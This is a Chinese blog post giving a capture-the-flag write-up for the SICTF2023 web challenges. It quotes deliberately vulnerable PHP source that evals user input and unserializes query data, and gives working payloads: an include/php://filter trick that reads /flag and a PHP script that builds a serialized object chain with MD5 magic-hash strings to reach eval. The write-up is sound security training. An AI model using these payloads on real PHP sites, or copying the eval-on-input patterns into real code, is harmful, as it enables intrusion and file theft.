Z1d10tのBlog

A note for myself,have fun!

SICTF2023 WEB WP

Z1d10t's Avatar 2023-09-10 各赛事WP

分享本文
  1. 1. Include
  2. 2. Baby_PHP
  3. 3. RCE
  4. 4. pain
  5. 5. 我全都要
  6. 6. DoyouknowCC
  7. 7. 你能跟得上我的speed吗

SICTF2023

题目梯度设置的不太合理 两极分化过于严重力

Include

考察伪协议php://filter/read=convert.base64-encode/resource=

Baby_PHP

这个题 很让人难绷 原题的非预期在这道题目上有问题 命令执行没结果。。

考点:

  • 套娃也就是无参RCE
  • php非法命名
  • %0a换行绕过

img

RCE

源码:

1
2
3
4
5
6
7
8
<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
$code = str_replace("(","hacker",$code);
$code = str_replace(".","hacker",$code);
eval($code);
?>

过滤了括号和点

这里需要知道就是include可以不用括号就能包含文件

payload:

1
2
post:code=include$_GET['x'];
get:x=php://filter/read=convert.base64-encode/resource=/flag

pain

java捏 不会

我全都要

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
<?php
highlight_file(__FILE__);

class B{
    public $pop;
    public $i;
    public $nogame;

    public function __destruct()
    {
        if(preg_match("/233333333/",$this->pop)){
            echo "这是一道签到题,不能让新生一直做不出来遭受打击";
        }
    }

    public function game(){
        echo "扣1送地狱火";
        if ($this->i = "1"){
            echo '<img src=\'R.jpg\'>';
            $this->nogame->love();
        }
    }

    public function __clone(){
        echo "必须执行";
        eval($_POST["cmd"]);
    }
}


class A{
    public $Aec;
    public $girl;
    public $boy;

    public function __toString()
    {
        echo "I also want to fall in love";
        if($this->girl != $this->boy && md5($this->girl) == md5($this->boy)){
            $this->Aec->game();
        }
    }


}


class P{
    public $MyLover;
    public function __call($name, $arguments)
    {
        echo "有对象我会在这打CTF???看我克隆一个对象!";
        if ($name != "game") {
            echo "打游戏去,别想着对象了";
            $this->MyLover = clone new B;
        }
    }


}


if ($_GET["A_B_C"]){
    $poc=$_GET["A_B_C"];
    unserialize($poc);

其实就一个点 __toSting()的调用靠preg_match("/233333333/",$this->pop)

img

可以看到是string类型的

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
class B{
    public $pop;
    public $i;
    public $nogame;
}
class A{
    public $Aec;
    public $girl;
    public $boy;

}
class P{
    public $MyLover;
}
$a=new B();
$a->pop=new A();
$a->pop->girl= 'QNKCDZO';
$a->pop->boy='240610708';
$a->pop->Aec=new B();
$a->pop->Aec->i='1';
$a->pop->Aec->nogame=new P();
echo urlencode(serialize($a));
?>
#O%3A1%3A%22B%22%3A3%3A%7Bs%3A3%3A%22pop%22%3BO%3A1%3A%22A%22%3A3%3A%7Bs%3A3%3A%22Aec%22%3BO%3A1%3A%22B%22%3A3%3A%7Bs%3A3%3A%22pop%22%3BN%3Bs%3A1%3A%22i%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22nogame%22%3BO%3A1%3A%22P%22%3A1%3A%7Bs%3A7%3A%22MyLover%22%3BN%3B%7D%7Ds%3A4%3A%22girl%22%3Bs%3A7%3A%22QNKCDZO%22%3Bs%3A3%3A%22boy%22%3Bs%3A9%3A%22240610708%22%3B%7Ds%3A1%3A%22i%22%3BN%3Bs%3A6%3A%22nogame%22%3BN%3B%7D

DoyouknowCC

java 会不了一点

你能跟得上我的speed吗

考点:

  • 条件竞争

上传和读取同时进行,看脸要等很长时间才成功。。。

img

本文最后更新于 天前,文中所描述的信息可能已发生改变

本文发表于 

各赛事WP